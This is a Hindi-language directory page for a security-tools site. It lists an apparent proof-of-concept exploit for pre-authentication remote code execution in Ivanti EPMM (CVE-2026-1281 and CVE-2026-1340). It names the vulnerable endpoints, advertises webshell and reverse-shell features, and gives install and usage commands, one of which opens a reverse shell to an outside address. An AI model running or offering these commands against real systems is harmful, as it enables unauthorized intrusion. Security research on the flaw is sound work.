Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — # CVE-2026-1281 और CVE-2026-1340 के लिए प्रूफ ऑफ कॉन्सेप्ट - Ivanti EPMM प्री-ऑथ RCE बैश अरिथमेटिक एक्सपैंशन के माध्यम से | Kitploit
उपकरण/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

# CVE-2026-1281 और CVE-2026-1340 के लिए प्रूफ ऑफ कॉन्सेप्ट - Ivanti EPMM प्री-ऑथ RCE बैश अरिथमेटिक एक्सपैंशन के माध्यम से

रिपॉजिटरी देखें
616 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-1281 और CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ अस्वीकरण: यह PoC केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। स्पष्ट अनुमति के बिना उपयोग अवैध है।

🎯 विवरण

CVE-2026-1281 और CVE-2026-1340 कमजोरियों के शोषण के लिए पूर्ण Proof of Concept (PoC) जो Ivanti Endpoint Manager Mobile (EPMM) को प्रभावित करती हैं। ये कमजोरियाँ Bash Arithmetic Expansion तंत्र के माध्यम से बिना प्रमाणीकरण के दूरस्थ रूप से मनमाना कोड निष्पादन (RCE) की अनुमति देती हैं।

कमजोरियाँ

  • CVE-2026-1281 : /mifs/c/appstore/fob/ एंडपॉइंट में कोड इंजेक्शन
  • CVE-2026-1340 : /mifs/c/aftstore/fob/ एंडपॉइंट में कोड इंजेक्शन
  • CVSS स्कोर : 9.8 (Critical)
  • शोषण : वास्तविक दुनिया में सक्रिय (Zero-Day)
  • 🚀 विशेषताएँ

    • ✅ स्वचालित सत्यापन फ्रेमवर्क (8 परीक्षण)
    • ✅ Pre-Auth RCE शोषण
    • ✅ स्वचालित रिवर्स शेल
    • ✅ वेबशेल तैनाती
    • ✅ 50+ तैयार पेलोड
    • ✅ ब्लू टीम के लिए डिटेक्शन स्क्रिप्ट
    • ✅ पूर्ण दस्तावेज़ीकरण

    📦 स्थापना

    root@kitploit:~
    git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
    cd CVE-2026-1281-Ivanti-EPMM-RCE
    pip3 install -r requirements.txt
    chmod +x *.py
    

    🎯 त्वरित उपयोग

    root@kitploit:~
    # कमजोरी परीक्षण
    python3 exploit.py -t https://target.com -c
    
    # RCE सत्यापन
    python3 exploit.py -t https://target.com --test-rce
    
    # रिवर्स शेल
    python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
    

    📚 दस्तावेज़ीकरण

    • पूर्ण README - विस्तृत तकनीकी दस्तावेज़ीकरण
    • उपयोग गाइड - चरण-दर-चरण गाइड
    • पेलोड - 50+ पेलोड का संग्रह
    • रेड टीम गाइड - परिचालन परिदृश्य

    🔗 संदर्भ

    • CERT-FR CERTFR-2026-ALE-001
    • Watchtowr Labs Analysis
    • CVE-2026-1281
    • CVE-2026-1340

    👤 लेखक

    Mehdi Le Deaut - Cybersecurity Consultant | Red Team Specialist

    LinkedIn

    ⚖️ लाइसेंस

    यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है - अधिक विवरण के लिए LICENSE फ़ाइल देखें।

    🙏 धन्यवाद

    • त्वरित चेतावनी के लिए CERT-FR
    • तकनीकी विश्लेषण के लिए Watchtowr Labs
    • साइबर सुरक्षा समुदाय
    टूल डाउनलोड करें